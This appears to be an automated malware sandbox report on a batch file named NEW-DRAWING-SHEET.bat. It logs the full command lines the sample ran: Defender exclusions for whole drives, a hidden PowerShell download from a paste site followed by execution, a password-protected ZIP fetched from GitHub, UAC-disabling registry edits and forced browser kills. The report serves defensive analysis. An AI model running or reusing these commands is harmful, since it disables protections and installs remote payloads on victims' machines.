          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8288Thread sleep time: -11990383647911201s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8220Thread sleep count: 2578 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8524Thread sleep count: 6467 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8556Thread sleep time: -6456360425798339s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8508Thread sleep count: 3213 > 30
          Source: C:\Windows\System32\timeout.exe TID: 8748Thread sleep count: 70 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8808Thread sleep count: 6816 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8808Thread sleep count: 2699 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8840Thread sleep time: -5534023222112862s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8924Thread sleep count: 7454 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8952Thread sleep time: -7378697629483816s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8928Thread sleep count: 2233 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9044Thread sleep count: 6748 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9028Thread sleep count: 2987 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9068Thread sleep time: -4611686018427385s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9152Thread sleep count: 6273 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9148Thread sleep count: 3414 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9188Thread sleep time: -4611686018427385s >= -30000s
          Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: powershell.exe, 00000004.00000002.1768300846.00000218F29DF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW9
          Source: svchost.exe, 00000011.00000002.2922149642.000001EB8E654000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: svchost.exe, 00000011.00000002.2920591206.000001EB88E27000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW |e
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Yara detected Powershell download and execute
          Source: Yara matchFile source: NEW-DRAWING-SHEET.bat, type: SAMPLE
          Source: Yara matchFile source: amsi64_7440.amsi.csv, type: OTHER
          Source: Yara matchFile source: amsi64_7656.amsi.csv, type: OTHER
          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7440, type: MEMORYSTR
          Adds a directory exclusion to Windows Defender
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "$dPath = [System.IO.Path]::Combine($Env:USERPROFILE, 'Downloads'); Add-MpPreference -ExclusionPath $dPath"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "Add-MpPreference -ExclusionPath '$env:TEMP\Startup'"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "Add-MpPreference -ExclusionPath 'D:\'"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "Add-MpPreference -ExclusionPath 'F:\'"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "$tempPath = $Env:TEMP; Add-MpPreference -ExclusionPath $tempPath"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'"Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "$dPath = [System.IO.Path]::Combine($Env:USERPROFILE, 'Downloads'); Add-MpPreference -ExclusionPath $dPath"Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "Add-MpPreference -ExclusionPath '$env:TEMP\Startup'"Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "Add-MpPreference -ExclusionPath 'D:\'"Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "Add-MpPreference -ExclusionPath 'F:\'"Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "$tempPath = $Env:TEMP; Add-MpPreference -ExclusionPath $tempPath"Jump to behavior
          Bypasses PowerShell execution policy
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/a1af5a4d0301', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))"
          Excessive usage of taskkill to terminate processes
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM firefox.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM iexplore.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM opera.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM safari.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM brave.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM vivaldi.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM epic.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM yandex.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM tor.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM CMD.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\NEW-DRAWING-SHEET.bat" Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/a1af5a4d0301', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))"Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ep remotesigned -Command "IEX $([System.IO.File]::ReadAllText('C:\Users\user\Desktop\NEW-DRAWING-SHEET.bat'))"Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main/DOC.zipJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 9Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\7-Zip\7z.exe "C:\Program Files\7-Zip\7z.exe" x "C:\Users\user\Downloads\DOC.zip" -o"C:\Users\user\Downloads" -pFuckSyrialAndFreePsAndFreeSyria00963 Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 9Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v dontdisplaylastusername /t REG_DWORD /d 0 /fJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM firefox.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM iexplore.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM opera.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM safari.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM brave.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM vivaldi.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM epic.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM yandex.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM tor.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM CMD.exeJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /k %TEMP%\BatchByloadStartHid.bat / Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /fJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableInstallerDetection /t REG_DWORD /d 0 /fJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableUIADesktopToggle /t REG_DWORD /d 0 /fJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableVirtualization /t REG_DWORD /d 0 /fJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableUwpStartupTasks /t REG_DWORD /d 0 /fJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableSecureUIAPaths /t REG_DWORD /d 0 /fJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableFullTrustStartupTasks /t REG_DWORD /d 0 /fJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableCursorSuppression /t REG_DWORD /d 0 /fJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DSCAutomationHostEnabled /t REG_DWORD /d 0 /fJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v dontdisplaylastusername /t REG_DWORD /d 0 /fJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorUser /t REG_DWORD /d 0 /fJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /fJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'"Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "$dPath = [System.IO.Path]::Combine($Env:USERPROFILE, 'Downloads'); Add-MpPreference -ExclusionPath $dPath"Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "Add-MpPreference -ExclusionPath '$env:TEMP\Startup'"Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "Add-MpPreference -ExclusionPath 'D:\'"Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "Add-MpPreference -ExclusionPath 'F:\'"Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -Command "$tempPath = $Env:TEMP; Add-MpPreference -ExclusionPath $tempPath"Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM firefox.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM iexplore.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM opera.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM safari.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM brave.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM vivaldi.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM epic.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM yandex.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM tor.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM CMD.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
